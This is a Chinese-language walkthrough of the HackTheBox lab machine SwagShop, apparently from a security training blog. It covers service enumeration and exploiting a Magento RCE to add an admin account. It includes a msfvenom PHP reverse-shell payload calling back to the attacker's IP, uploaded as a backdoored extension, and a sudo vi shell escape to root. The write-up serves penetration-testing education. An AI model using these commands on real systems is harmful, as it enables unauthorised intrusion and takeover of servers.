渗透测试
HTB靶机系列-SwagShop
2019-07-17 11:10

(一)介绍

今天给大家带来的是一个HTB(hackthebox)的靶机—SwagShop,这是一个easy级别的linux系统的靶机,所以主要是对枚举,信息收集等手段的考察。对OSCP感兴趣的同学也可以去试着去HTB上找些靶机做做看。

1.jpg

(二)信息收集

对目标进行一个初步的扫描。nmap -T4 -sC -sV10.10.10.140

发现只对22端口以及80端口进行了开放。

2.jpg

顺便对其进行目录遍历,我们发现一个有意思的目录,这个有用,后面再说。dirbhttp://10.10.10.140 /usr/share/dirb/wordlists/common.txt

3.jpg

我们打开网站,通过火狐的插件Wappalyzer,或者网页logo就可以发现是个开源的电子商务网站。

4.png

5.jpg


(三)漏洞利用

通过searchsploit搜索发现漏洞还是挺多的。

6.jpg

我们发现一个RCE漏洞吸引了我们的注意力,所以我们选择37977的漏洞试试,把expcp到我们的目录,发现这个脚本可以创建一个admin权限的账户。但是我们需要改变一下里面的内容,target为我们的目标ip:http://10.10.10.140/index.php,并且删除一些不必要的注释。

参考地址:http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/

此时运行我们的exp

7.png

显示我们的exp运行了,但是这个后台地址是不对的,这就要用到刚刚我们扫到的地址了,http://10.10.10.140/downloader/这个地址也可以直接用exp添加的账户进行登陆

8.jpg

我们成功登陆了后台,之后我们可以用在google找到的后门项目进行备份还原来拿shell,https://github.com/P34C3-07/LavaMagentoBD

我们可以用msf来生成一个php后门,msfvenom -pphp/meterpreter/reverse_tcp LHOST=10.10.14.175 LPORT=4444 -f raw >shell.php
之后在压缩包放置你的shell,这里我的路径是/app/code/community/Lavalamp/Connector/IndexController.php

用Directpackage file upload功能进行上传

9.png

上传成功.接下来msf进行监听,成功返回shell。

0.png

我们可以在/home/haris找到第一个user.txt

11.jpg

(四)提权

接下来我们要进行提权,sudo-l看一下,发现可以不用密码就以root权限执行vi。

12.png

我们可以去/var/www/html/目录下创建一个文件,利用vi的-c参数进行提权,我们利用这条指令即可提权,如图显示提权成功,获取到root.txt

sudo   vi  /var/www/html/111  -c  '!sh'

13.png

(五)相关实验

VulnHub渗透测试实战:Vulnhub是一个面向公众开放的靶机平台,主旨是让任何人获得信息安全相关的实战经验。里面有很多设计好的练习靶机镜像,每个镜像有一个或多个flag。

长按下面二维码,或点击合天网安实验室,可预览学习(PC端操作最佳哟)

14.png
长按开始学习

 

上一篇:Metasploit快速入门(一)
下一篇:渗透测试实战——prime靶机入侵
版权所有 合天智汇信息技术有限公司 2013-2021 湘ICP备14001562号-6
Copyright © 2013-2020 Heetian Corporation, All rights reserved
4006-123-731